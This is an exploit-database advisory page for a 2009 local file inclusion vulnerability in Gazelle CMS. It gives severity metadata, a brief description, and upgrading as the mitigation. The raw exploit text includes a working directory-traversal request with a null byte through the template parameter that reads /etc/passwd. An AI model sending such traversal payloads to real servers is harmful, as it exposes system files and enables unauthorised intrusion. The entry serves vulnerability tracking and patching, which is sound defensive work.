header-logo
Suggest Exploit
vendor:
Gazelle CMS
by:
milw0rm.com
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Gazelle CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:anantasoft:gazelle_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Gazelle CMS Local File Inclusion

Gazelle CMS is vulnerable to a local file inclusion vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with a maliciously crafted template parameter. This will allow the attacker to include arbitrary local files on the server.

Mitigation:

Upgrade to the latest version of Gazelle CMS.
Source

Exploit-DB raw data:

Gazelle CMS Local File Inclusion
http://www.anantasoft.com/

/gazelle/?template=../../../../../../../../../../../../etc/passwd%00 (view source)

Author notified: Jan 20

http://nukeit.org

# milw0rm.com [2009-01-28]